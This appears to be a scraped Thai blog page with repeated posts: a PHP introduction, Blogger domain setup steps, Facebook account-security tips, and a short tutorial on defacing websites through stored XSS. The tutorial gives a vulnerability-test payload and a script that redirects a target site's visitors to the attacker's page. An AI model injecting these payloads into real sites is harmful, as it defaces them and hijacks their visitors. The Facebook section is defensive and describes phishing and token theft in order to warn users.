วันอังคารที่ 26 มิถุนายน พ.ศ. 2561
วันอังคารที่ 11 สิงหาคม พ.ศ. 2558
PHP คืออะไร ?
PHP คืออะไร
หลายคนที่ทำเว็บไซต์ด้วย HTML หรือโปรแกรมช่วยสร้างเว็บไซต์ต่างๆ เช่น Dreamweaver แล้วอาจสงสัยว่าเมื่อทำ form สำหรับ รับค่าเช่น ชื่อ ที่อยู่ เสร็จแล้วจะเก็บค่ายังไง หรือจะทำอย่างไรต่อ หรือเว็บบอร์ดทำงานอย่างไร CMS ทำงานอย่างไร ทำไมบางเว็บไซต์สามารถโต้ตอบกับ ผู้ใช้งานได้ คำตอบของทุกคำถามคือ PHP ครับ
PHP นั้นเป็นภาษาสำหรับใช้ในการเขียนโปรแกรมบนเว็บไซต์ สามารถเขียนได้หลากหลายโปรแกรมเช่นเดียวกับภาษาทั่วไป อาจมีข้อสงสัยว่า ต่างจาก HTML อย่างไร คำตอบคือ HTML นั้นเป็นภาษาที่ใช้ในการจัดรูปแบบของเว็บไซต์ จัดตำแหน่งรูป จัดรูปแบบตัวอักษร หรือใส่สีสันให้กับ เว็บไซต์ของเรา แต่ PHP นั้นเป็นส่วนที่ใช้ในการคำนวน ประมวลผล เก็บค่า และทำตามคำสั่งต่างๆ อย่างเช่น รับค่าจากแบบ form ที่เราทำ รับค่าจากช่องคำตอบของเว็บบอร์ดและเก็บไว้เพื่อนำมาแสดงผลต่อไป แม้แต่กระทั่งใช้ในการเขียน CMS ยอดนิยมเช่น Drupal , Joomla พูดง่ายๆคือเว็บไซต์จะโต้ตอบกับผู้ใช้ได้ ต้องมีภาษา PHP ส่วน HTML หรือ Javascript ใช้เป็นเพียงแค่ตัวควบคุมการแสดงผลเท่านั้น
นอกจากภาษา PHP แล้วยังมีภาษาอื่นอีกหรือไม่
คำตอบคือมีครับ เช่น ASP , JSP แต่ที่นิยมมาก คือ PHP เพราะเป็นภาษาที่สามารถศึกษาได้ง่าย ทำงานได้มีประสิทธิภาพ ทำให้เป็นที่นิยมอย่างยิ่งในปัจจุบัน รวมทั้งมีชุมชนคนใช้งาน และคู่มือที่ ดีมาก และสำคัญสุดคือฟรีครับ การใช้งานภาษา PHP ไม่ต้องมีค่าใช้จ่ายใดๆทั้งสิ้น ทุกคนสามารถเข้าถึงได้
การจะเขียน PHP ต้องมีอะไรบ้าง
อย่างที่บอกไปว่า PHP นั้นจำเป็นจะต้องมีการประมวลผลดังนั้นการใช้งานเราจะต้องมี Web Server เพื่อให้ตัว PHP สามารถทำงานได้ ต่างจาก HTML งั้นจะทำอย่างไรถ้าเราไม่ได้เช่า Web Server เอาไว้จะใช้งาน PHP ไม่ได้หรือ คำตอบคือได้ครับ แต่เราจะต้องลงโปรแกรม ให้เครื่องที่เราใช้งานอยู่นั้นทำงานเหมือนกับ Web Server ซะก่อนซึ่งโปรแกรมนั้นชื่อว่า Apache ครับเป็นโปรแกรมฟรีเหมือนกัน นี่เป็นข้อดี ที่ทำให้ทุกคนรัก PHP ครับ หลังจากที่เราทำให้เครื่องของเรานั้นเหมือนกับ Web Server แล้วจะเก็บข้อมูลเว็บไซต์เช่น คำตอบของเว็บบอร์ด จะเก็บอย่างไร คำตอบคือต้องมีโปรแกรมฐานข้อมูลอีกตัวเข้ามาช่วยครับ ซึ่งโปรแกรมที่แนะนำคือ MySQL ครับฟรีอีกเช่นกัน ทั้งหมดสำหรับมือใหม่อาจ จะเริ่มลงโปรแกรมทั้งหมดนั้นยากนะครับ จึงมีโปรแกรมที่รวมทุกอย่าง เพื่อจำลองเครื่องของเราให้เป็น Web Server เลยสามารถลงได้ง่ายๆ ซึ่ง จะมีสอนในบทต่อไปนะครับ
การพัฒนาเว็บไซต์ด้วย PHP
สำหรับผู้พัฒนาเว็บไซต์ด้วย PHP นั้นปรกติจะทำการจำลองเครื่องของตัวเองให้เป็น Web Server ระหว่างการพัฒนาเพื่อดูการทำงาน ของโปรแกรมที่เขียนขึ้นมาครับ จากนั้นจึงจะอัพไฟล์ทั้งหมดลงใน Web Server จริงครับ ในส่วนของ Web Server นั้นทาง Hellomyweb ก็มีให้บริการอยู่นะครับ สนใจคลิกที่นี่ครับ ถามว่าเราจะให้เครื่องคอมพิวเตอร์ของเรานั้นทำงานได้เหมือนกับ Web server จริงได้หรือไม่ คำตอบคือได้ครับ แต่มันออกจะไม่คุ่มค่า ทางการเงินนะครับ เพราะเราต้องเสียค่าไฟ ค่าอินเตอร์เน็ต เครื่องคอมก็ต้องเปิดไว้ตลอดปิดไม่ได้ เวลาผู้ใช้งานจากภายนอกมาเรียกใช้ก็รองรับไม่ได้ไม่มาก ดังนั้นการเช่า Web Server ภายนอกจะคุ่มค่ามากกว่าครับ หากต้องการจะพัฒนาเว็บไซต์เพื่อใช้งานจริงๆ
สำหรับคนที่มีข้อสงสัยหรือมีคำถามสามารถตั้งคำถามได้ที่ Webboard ของ Hellomyweb นะครับ ทางเรายินดีตอบทุกคำถามครับ สำหรับบทต่อไปจะพูดถึงโปรแกรมที่ทำการจำลองเว็บไซต์ของเราให้เป็น Web Server ครับ
XSS วิธีเปลี่ยนหน้าตาเว็ปไซต์เด้งมาหน้าเว็บเรา VDO {HD}
XSS วิธีเปลี่ยนหน้าตาเว็ปไซต์เด้งมาหน้าเว็บเรา (Defacing) ช่องโหว่แบบ Persistent
ก่อนอื่นเปิด Proxy
เสร็จแล้วก็ดูตาม Video เลยครับ
สคริปที่ใช้ (เฉพาะในคลิปนี้)
ทดสอบว่าเว็ปไซต์เป้าหมายมีช่องโหว่ไหม
Code:
<script>alert('Hacked By JokerTeamHack')</script>
ทำให้หน้าเว็ปเด้งไปที่เว็ปไซต์เราโดยตรง
Code:
<script>window.location="http://www.เว็ปของคุณ.com";</script>
ก่อนอื่นเปิด Proxy
เสร็จแล้วก็ดูตาม Video เลยครับ
สคริปที่ใช้ (เฉพาะในคลิปนี้)
ทดสอบว่าเว็ปไซต์เป้าหมายมีช่องโหว่ไหม
Code:
<script>alert('Hacked By JokerTeamHack')</script>
ทำให้หน้าเว็ปเด้งไปที่เว็ปไซต์เราโดยตรง
Code:
<script>window.location="http://www.เว็ปของคุณ.com";</script>
วันเสาร์ที่ 18 กรกฎาคม พ.ศ. 2558
วิธีตั้งค่า ( Domain ) โดเมน เพื่อใช้งานกับ Blogger หรือ Blogspot
วิธีตั้งค่า ( Domain name ) โดเมน
เพื่อใช้งานกับ Blogger หรือ Blogspot
ผู้รับบริการโดเมนเนม สามารถกำหนดการตั้งค่า เพื่อใช้งานกับ Blogger หรือ Blogspot ได้ง่ายๆ
โดยในบทความนี้ แสดงตัวอย่างโดยใช้ชื่อโดเมนเนม siamego.com กล่าวคือ เมื่อดำเนินการตามบทความ
ให้เปลี่ยนชื่อ siamego.com เป็นชื่อโดเมนของท่าน
โดยแบ่งการจัดการเป็น 2 ส่วนคือ
- จัดการติดตั้ง โดเมนเนม สำหรับใช้งานที่ Blogger
- จัดการตั้งค่า DNS ให้กับ Domain name
- การตั้งค่า ให้สามารถเรียกใช้งานแบบ www หรือ ไม่มี www ก็ได้
1. จัดการติดตั้ง โดเมนเนม สำหรับใช้งานที่ Blogger
1.1 คลิก การตั้งค่า > พื้นฐาน
1.2 คลิก เปลี่ยนเป็นการตั้งค่าขั้นสูง
1.3 คลิก ระบุชื่อโดเมนเนม เปลี่ยน thaiego เป็นชื่อโดเมนของท่าน (ระบุ www) และกด บันทึก
1.4 นำค่า Domain Record ในกรอบสีแดง ตั้งค่าในระบบจัดการโดเมนเนม ในข้อ 2 หรือ แจ้งกับเจ้าหน้าที่
1.4 นำค่า Domain Record ในกรอบสีแดง ตั้งค่าในระบบจัดการโดเมนเนม ในข้อ 2 หรือ แจ้งกับเจ้าหน้าที่
2. จัดการตั้งค่า DNS ให้กับ Domain name
2.1 Login เข้าสู่ระบบจัดการ โดเมนเนม
https://domain.ireallyhost.com
วิธีการเข้าจัดการ โดเมนเนม
https://www.ireallyhost.com/kb/domain/285
หมายเหตุ
ยกเว้น .TH อาทิ .co.th .in.th .or.th .go.th .net.th
ให้นำค่าในกรอบสีแดง แจ้งกับเจ้าหน้าที่ไอเรียลลี่โฮสดำเนินการติดตั้งให้
วิธีการเข้าจัดการ โดเมนเนม
https://www.ireallyhost.com/kb/domain/285
หมายเหตุ
ยกเว้น .TH อาทิ .co.th .in.th .or.th .go.th .net.th
ให้นำค่าในกรอบสีแดง แจ้งกับเจ้าหน้าที่ไอเรียลลี่โฮสดำเนินการติดตั้งให้
2.2 เลือกโดเมมที่ต้องการ และ คลิก Manage DNS
2.3 ตั้งค่า CNAME โดย คลิก CNAME Records > คลิก Add CNAME Record
นำค่า CNAME ในข้อ 1.4 ใช้ตั้งค่า ดังนี้
2.3 ตั้งค่า CNAME โดย คลิก CNAME Records > คลิก Add CNAME Record
นำค่า CNAME ในข้อ 1.4 ใช้ตั้งค่า ดังนี้
ผลที่ได้
2.4 ตั้งค่า DNS ให้กับโดเมนเนม โดยรีเฟรชเบราว์เซอร์ ระบบจัดการโดเมนเนม
คลิก Configure Now > Fix Name Servers Automatically
เมื่อทำการตั้งค่าสมบูรณ์ โปรดรอ DNS Update ราว 1-72 ชม.
และทำการ Verify การตั้งค่า โดเมนเนม ดังข้อ 1 อีกครั้ง
และเมื่อทำการติดตั้งโดเมน กับ Blogger เสร็จให้ดำเนินการในขั้นตอนที่ 3 ต่อไป
DNS Update หมายถึง ระยะเวลาที่อินเตอร์เน็ตของผู้เยี่ยมชมเว็บไซต์ หรือ ISP มองเห็นการเปลี่ยนแปลงเส้นทางโดเมนเนม โดยมีระยะเวลาไม่เท่ากัน อาจใช้ระยะเวลา 1-48 ชม. หรือ 1-72 ชม. โดยประมาณ
3. การตั้งค่าโดเมน ใช้กับ Blogger ให้ใช้แบบมี www หรือ ไม่มี www ก็ได้
หรือ none www redirect to www
เช่น https://siamego.com -> https://www.siamego.com โดยอัตโนมัติ
3.1 ภายหลังจากตั้งค่าโดเมน ให้กับ Blogger (ในข้อ 1) เรียบร้อยแล้ว
> คลิก แก้ไข
> ติ๊ก เปลี่ยนเส้นทาง domain.com ไปที่ www.domain.com
> กดบันทึก
ก็จะพบว่า สามารถใช้งานโดเมนเนม กับ Blogger ได้อย่างสมบูรณ์ ทั้งแบบมี www และ ไม่มี www
วิธีป้องกัน ไม่ให้โดน Hack เฟสบุ๊ค
ในฐานะที่ แอดมิน อยู่ในสังคม Hacker มานาน ก็ขอทำหน้าที่ หมวกขาว ซักวัน เพื่อ ปกป้องความ เป็น ส่วน ตัว ของ Facebook เรานะครับ วันนี้ ผมจะมาแนะนำวิธี การ ป้องกัน ตัว ไม่ให้โดน Hack รหัสผ่าน และ ก็อีเมล์ Facebook ของเรา นะครับ จะทำได้ ยังไง กัน เอาล่ะ ผมอยากให้ ลูกเพจ มาศึกษา ไปพร้อมๆ กันน่ะครับ
ก่อนอื่น ต้องขอบอกก่อนเลย นะครับ ว่า เว็บไซต์ Facebook เป็น Social Network ที่มีระดับความปลอดภัยสูง มาก คือ แทบจะไม่มี ช่องโหว่ ให้ Hacker คนไหน ได้ ฝึก วิชา เลย ล่ะครับ เพราะ เขา ปิดช่องโหว่ กันเกือบจะทุกวัน
ดังนั้น ข่าวลือ เรื่องเจอ ช่องโหว่ Facebook จริงๆ จะมีน้อย มากหรือ แทบ จะไม่มี เลย เพราะ ฉนั้น เรามั่นใจ ใน Security ของ Facebook แน่นอน ว่าไม่มี ช่องโหว่ อะไร ให้เจาะ เข้าไป ขโมย ข้อมูล ได้ โดยตรง
แต่ถ้า จะเจาะ ได้ ก็คง มาจาก ตัว User เองครับ ที่ไม่ระมัด ระวังตัวเอง
เทคนิคแรกก็คือ
1 เปลี่ยน รหัสผ่าน Facebook ทุกเดือนครับ แน่นอน วิธีนี้ Work 100%
2 เวลาที่มีคนมาโพสต์ อะไรลง หน้า Wall ของเราแล้ว มีลิงค์ ที่หน้าสงสัย มันคือ phishing นั้นเอง ครับ phishing คืออะไร มันก็คือ หน้าเว็บปลอม ที่ทำ ไว้เลียน แบบ Facebook นั้นเอง ครับ โดยจะมีฟอร์ม ให้เรากรอก E-Mail และก็ รหัส ผ่าน ลงไป แต่ !! เดี๋ยวก่อน เมื่อเรา คลิก เข้าสู่ ระบบ คุณรู้ ไหมครับ ว่ามี อะไร ทำงาน อยู่เบื้อง หลังของ มัน มัน ก็คือ Action : login.php นั้น เอง ครับ ที่ถูก เปลี่ยน เป็น ฟรอม์ ดักรหัส โดยใช้ Method POST โดยอาศัยหลักการ ง่ายๆ นี้ Hacker ก็ได้ รหัสผ่าน Facebook ของท่านไปแล้ว ครับ
สำหรับ วิธี ป้องกันน่ะ ครับ อย่างแรกเลย คือ อย่า !! คลิกลิงค์ อันนั้นครับ ลบออกไปเลย และต่อมาให้ เราดูที่ ช่อง URL เป็น หลัก ถ้า URL ไม่ใช่ ของ Facebook จริงๆ ห้าม !! ใส่ รหัส และคลิก Log In เด็จขาดครับ
แต่ถ้าใครสงสัยว่าจะโดน ฟิชชิ่ง หรือ ว่า โดน ดักรหัสไปแล้ว ล่ะ จะทำยังไง สิ่งที่คุณทำได้ คือ การเปลี่ยน รหัส ผ่านครับ เอาให้คาดเดา ได้ ยากที่สุด เครนะครับ
3 อีก เทคนิค ยอดนิยม ของ Hacker ที่สามารถ สาวมาถึง Account หรือ บัญชี ผู้ใช้ Facebook ของคุณ ได้ ก็คือ การใช้ อีเมล์ และ รหัส ผ่าน ชุดเดียวกัน ครับ หลายคน สงสัย ว่า เอ๊ะ แล้วมันจะเกี่ยวกันยังไง เอ่ย แอดมินจะ อธิ บายง่ายๆ น่ะครับ ถ้าสมมุติ เราไป สมัคร สมาชิก เว็บ ไซต์ เว็บ หนึ่ง แล้วเรา ใช้ รหัสผ่าน และ ก็ E-Mail ที่ใช้ กับ Facebook ด้วย ถ้า เกิด เว็บ นั้น มีช่อง โหว่ SQL Injection ล่ะ แน่นอน เขาจะได้ อีเมล์ และ รหัสผ่าน ของคุณไปด้วย เพราะ ฉนั้น พยายาม ใช้รหัสผ่าน ใน แต่ล่ะ เว็บไซต์ ให้ต่าง กันน่ะครับ
4 การขโมย Access Token คีย์
Access token คืออะไร ได้มาจากไหน? มันก็คือชุดตัวอักษรชุดหนึ่งที่ app หรือ web app สร้างขึ้นมาเพื่อใช้ในการติดต่อกับ Facebook API เจ้า Access Token นี้จะถูกกำหนดมาแล้วว่าให้ดึงข้อมูลอะไรได้บ้างซึ่งเค้าก็จะบอกไว้ก่อนที่คุณจะกดอนุญาตให้ใช้ข้อมูลคุณได้ แต่หลายๆคนก็ไม่ยอมอ่านกดข้ามไปเลย)
เมื่อคุณกดปุ่ม Get Access token มันก็จะลิ้งค์กลับไปยังหน้าเฟซบุ้คของคุณ โดยจะมีแอพต่างๆที่คุณรู้จักเช่น Sony Xperia, Samsung Mobile ขออนุญาตเข้าถึงข้อมูลของคุณ (แอพเหล่านี้น่าจะเป็นแอพที่เหล่าแฮคเกอร์ทำขึ้น ถ้าลองคลิกเข้าไปดูรายละเอียดก็จะพบว่ามันขอเข้าถึงข้อมูลส่วนตัวของคุณเยอะมาก) แต่เป้าหมายสุดท้ายของผู้ไม่หวังดีก็คือต้องการให้นำ Access token ที่ปรากฎอยู่ในช่อง URL เฟซบุ้คของคุณไปใส่ในเว็บ more-liker-facebook.weebly.com ถ้าหากคุณกรอกมันเข้าไปแล้ว ก็เหมือนกับการมอบสิทธิ์ให้แฮคเกอร์สามารถโพสต์รูปหรือข้อความบนเฟซบุ้คของคุณได้โดยไม่ได้รับอนุญาต
วิธีที่ ทำ ให้ Access Token Key เสีย ก็ คือ การลบ แอพ Facebook ที่เรา กด ตกลง ออกครับ แล้ว มันลบ ยังไง ล่ะ ??
ให้เราไปที่นี่ https://www.facebook.com/settings?tab=applications น่ะครับ เจอแอพ อะไร ที่หน้าสงสัย หรือ ว่าเรา โพสต์ เองอะไร อย่างงี้ ก็ X ลบออกไปเลยน่ะครับ
อีกวิธี ที่ ทำให้ Access Token คีย์ เสียได้เหมือนกันก็คือ การ เปลี่ยน รหัสผ่าน Facebook น่ะครับ
5 การ ป้องกัน ไวรัส สแปม โทจัน มัลแวร์ ด้วย แอนตี้ ไวรัส อันนี้ จำเป็น และ สำคัญมากน่ะครับ ให้เราหมั่น ตรวจ สอบ คอยสแกนไวรัสทุกวันๆ รวมถึงไม่ดาวน์โหลด อะไร แปลกๆ บน Facebook หรือ จาก เว็บ ภายนอกเอง เด็จขาด
ที่สำคัญ อย่า ปิด Windows Defender ที่เปรียบ เสมือน หมา คอยเฝ้า ไล่กัด พวกไวรัส แปลกปลอม ต่างๆ ที่คอยเข้ามาใหเครื่องของเราด้วยน่ะครับ อันนี้ ก็น่า จะปลอด ภัย 100% ที่สำคัญ คือ อย่ากด Run หรือ คลิก โปรแกรม อะไร แปลกๆ
ที่เราไม่คุ้นเคย ด้วยน่ะครับ เพราะอาจจะเป็น โทจัน ก็ได้
6 หมั่นตรวจสอบดู บันทึกกิจกรรมด้วย น่ะครับ ว่าเราได้ไป กดไลค์ หรือ ไปโพสต์ อะไร ที่เราไม่ได้ เป็นคนดำเนินการเอง หรือไม่ ถ้าใช่ ก็หน้าจะเป็น ที่ตัว Access Token เองน่ะครับ จะโทษ อะไรไม่ได้
สำหรับวิธีแก้ไข ก็ ย้อนกลับไปดูที่ ข้อ 4 น่ะครับ
7 คอยเช็ค เซสซันการ ใช้งาน ตลอดเวลา น่ะครับ ว่ามี บุคคล ภายนอกแอบเข้ามา เล่น Facebook เราหรือไม่ โดยเข้าไปที่ https://www.facebook.com/settings…
ถ้าเห็น การ Log In จาก เซสซันหรือ อุปกรณ์ ที่เราไม่ รู้ จัก ก็ สั่ง หยุดกิจกรรม ได้เลยน่ะครับ สำหรับวิธีการ ป้องการ ตนเอง ไม่ให้ Facebook โดน Hack จาก ใคร ง่ายๆ
เราควร จะมา ตั้งค่า เพิ่มเติมเอา ที่นี่ https://www.facebook.com/settings?tab=security น่ะครับ จะได้ ปลอดภัย มากยิ่งขึ้น เอา ล่ะ ผมเขียน มา ตั้ง นาน แล้ว ขอแค่ คำขอบคุณ จาก ลูก เพจ หน่อยน่ะครับ จะได้ มีกำลังใจเขียนให้อ่าน อีก ^^
ก่อนอื่น ต้องขอบอกก่อนเลย นะครับ ว่า เว็บไซต์ Facebook เป็น Social Network ที่มีระดับความปลอดภัยสูง มาก คือ แทบจะไม่มี ช่องโหว่ ให้ Hacker คนไหน ได้ ฝึก วิชา เลย ล่ะครับ เพราะ เขา ปิดช่องโหว่ กันเกือบจะทุกวัน
ดังนั้น ข่าวลือ เรื่องเจอ ช่องโหว่ Facebook จริงๆ จะมีน้อย มากหรือ แทบ จะไม่มี เลย เพราะ ฉนั้น เรามั่นใจ ใน Security ของ Facebook แน่นอน ว่าไม่มี ช่องโหว่ อะไร ให้เจาะ เข้าไป ขโมย ข้อมูล ได้ โดยตรง
แต่ถ้า จะเจาะ ได้ ก็คง มาจาก ตัว User เองครับ ที่ไม่ระมัด ระวังตัวเอง
เทคนิคแรกก็คือ
1 เปลี่ยน รหัสผ่าน Facebook ทุกเดือนครับ แน่นอน วิธีนี้ Work 100%
2 เวลาที่มีคนมาโพสต์ อะไรลง หน้า Wall ของเราแล้ว มีลิงค์ ที่หน้าสงสัย มันคือ phishing นั้นเอง ครับ phishing คืออะไร มันก็คือ หน้าเว็บปลอม ที่ทำ ไว้เลียน แบบ Facebook นั้นเอง ครับ โดยจะมีฟอร์ม ให้เรากรอก E-Mail และก็ รหัส ผ่าน ลงไป แต่ !! เดี๋ยวก่อน เมื่อเรา คลิก เข้าสู่ ระบบ คุณรู้ ไหมครับ ว่ามี อะไร ทำงาน อยู่เบื้อง หลังของ มัน มัน ก็คือ Action : login.php นั้น เอง ครับ ที่ถูก เปลี่ยน เป็น ฟรอม์ ดักรหัส โดยใช้ Method POST โดยอาศัยหลักการ ง่ายๆ นี้ Hacker ก็ได้ รหัสผ่าน Facebook ของท่านไปแล้ว ครับ
สำหรับ วิธี ป้องกันน่ะ ครับ อย่างแรกเลย คือ อย่า !! คลิกลิงค์ อันนั้นครับ ลบออกไปเลย และต่อมาให้ เราดูที่ ช่อง URL เป็น หลัก ถ้า URL ไม่ใช่ ของ Facebook จริงๆ ห้าม !! ใส่ รหัส และคลิก Log In เด็จขาดครับ
แต่ถ้าใครสงสัยว่าจะโดน ฟิชชิ่ง หรือ ว่า โดน ดักรหัสไปแล้ว ล่ะ จะทำยังไง สิ่งที่คุณทำได้ คือ การเปลี่ยน รหัส ผ่านครับ เอาให้คาดเดา ได้ ยากที่สุด เครนะครับ
3 อีก เทคนิค ยอดนิยม ของ Hacker ที่สามารถ สาวมาถึง Account หรือ บัญชี ผู้ใช้ Facebook ของคุณ ได้ ก็คือ การใช้ อีเมล์ และ รหัส ผ่าน ชุดเดียวกัน ครับ หลายคน สงสัย ว่า เอ๊ะ แล้วมันจะเกี่ยวกันยังไง เอ่ย แอดมินจะ อธิ บายง่ายๆ น่ะครับ ถ้าสมมุติ เราไป สมัคร สมาชิก เว็บ ไซต์ เว็บ หนึ่ง แล้วเรา ใช้ รหัสผ่าน และ ก็ E-Mail ที่ใช้ กับ Facebook ด้วย ถ้า เกิด เว็บ นั้น มีช่อง โหว่ SQL Injection ล่ะ แน่นอน เขาจะได้ อีเมล์ และ รหัสผ่าน ของคุณไปด้วย เพราะ ฉนั้น พยายาม ใช้รหัสผ่าน ใน แต่ล่ะ เว็บไซต์ ให้ต่าง กันน่ะครับ
4 การขโมย Access Token คีย์
Access token คืออะไร ได้มาจากไหน? มันก็คือชุดตัวอักษรชุดหนึ่งที่ app หรือ web app สร้างขึ้นมาเพื่อใช้ในการติดต่อกับ Facebook API เจ้า Access Token นี้จะถูกกำหนดมาแล้วว่าให้ดึงข้อมูลอะไรได้บ้างซึ่งเค้าก็จะบอกไว้ก่อนที่คุณจะกดอนุญาตให้ใช้ข้อมูลคุณได้ แต่หลายๆคนก็ไม่ยอมอ่านกดข้ามไปเลย)
เมื่อคุณกดปุ่ม Get Access token มันก็จะลิ้งค์กลับไปยังหน้าเฟซบุ้คของคุณ โดยจะมีแอพต่างๆที่คุณรู้จักเช่น Sony Xperia, Samsung Mobile ขออนุญาตเข้าถึงข้อมูลของคุณ (แอพเหล่านี้น่าจะเป็นแอพที่เหล่าแฮคเกอร์ทำขึ้น ถ้าลองคลิกเข้าไปดูรายละเอียดก็จะพบว่ามันขอเข้าถึงข้อมูลส่วนตัวของคุณเยอะมาก) แต่เป้าหมายสุดท้ายของผู้ไม่หวังดีก็คือต้องการให้นำ Access token ที่ปรากฎอยู่ในช่อง URL เฟซบุ้คของคุณไปใส่ในเว็บ more-liker-facebook.weebly.com ถ้าหากคุณกรอกมันเข้าไปแล้ว ก็เหมือนกับการมอบสิทธิ์ให้แฮคเกอร์สามารถโพสต์รูปหรือข้อความบนเฟซบุ้คของคุณได้โดยไม่ได้รับอนุญาต
วิธีที่ ทำ ให้ Access Token Key เสีย ก็ คือ การลบ แอพ Facebook ที่เรา กด ตกลง ออกครับ แล้ว มันลบ ยังไง ล่ะ ??
ให้เราไปที่นี่ https://www.facebook.com/settings?tab=applications น่ะครับ เจอแอพ อะไร ที่หน้าสงสัย หรือ ว่าเรา โพสต์ เองอะไร อย่างงี้ ก็ X ลบออกไปเลยน่ะครับ
อีกวิธี ที่ ทำให้ Access Token คีย์ เสียได้เหมือนกันก็คือ การ เปลี่ยน รหัสผ่าน Facebook น่ะครับ
5 การ ป้องกัน ไวรัส สแปม โทจัน มัลแวร์ ด้วย แอนตี้ ไวรัส อันนี้ จำเป็น และ สำคัญมากน่ะครับ ให้เราหมั่น ตรวจ สอบ คอยสแกนไวรัสทุกวันๆ รวมถึงไม่ดาวน์โหลด อะไร แปลกๆ บน Facebook หรือ จาก เว็บ ภายนอกเอง เด็จขาด
ที่สำคัญ อย่า ปิด Windows Defender ที่เปรียบ เสมือน หมา คอยเฝ้า ไล่กัด พวกไวรัส แปลกปลอม ต่างๆ ที่คอยเข้ามาใหเครื่องของเราด้วยน่ะครับ อันนี้ ก็น่า จะปลอด ภัย 100% ที่สำคัญ คือ อย่ากด Run หรือ คลิก โปรแกรม อะไร แปลกๆ
ที่เราไม่คุ้นเคย ด้วยน่ะครับ เพราะอาจจะเป็น โทจัน ก็ได้
6 หมั่นตรวจสอบดู บันทึกกิจกรรมด้วย น่ะครับ ว่าเราได้ไป กดไลค์ หรือ ไปโพสต์ อะไร ที่เราไม่ได้ เป็นคนดำเนินการเอง หรือไม่ ถ้าใช่ ก็หน้าจะเป็น ที่ตัว Access Token เองน่ะครับ จะโทษ อะไรไม่ได้
สำหรับวิธีแก้ไข ก็ ย้อนกลับไปดูที่ ข้อ 4 น่ะครับ
7 คอยเช็ค เซสซันการ ใช้งาน ตลอดเวลา น่ะครับ ว่ามี บุคคล ภายนอกแอบเข้ามา เล่น Facebook เราหรือไม่ โดยเข้าไปที่ https://www.facebook.com/settings…
ถ้าเห็น การ Log In จาก เซสซันหรือ อุปกรณ์ ที่เราไม่ รู้ จัก ก็ สั่ง หยุดกิจกรรม ได้เลยน่ะครับ สำหรับวิธีการ ป้องการ ตนเอง ไม่ให้ Facebook โดน Hack จาก ใคร ง่ายๆ
เราควร จะมา ตั้งค่า เพิ่มเติมเอา ที่นี่ https://www.facebook.com/settings?tab=security น่ะครับ จะได้ ปลอดภัย มากยิ่งขึ้น เอา ล่ะ ผมเขียน มา ตั้ง นาน แล้ว ขอแค่ คำขอบคุณ จาก ลูก เพจ หน่อยน่ะครับ จะได้ มีกำลังใจเขียนให้อ่าน อีก ^^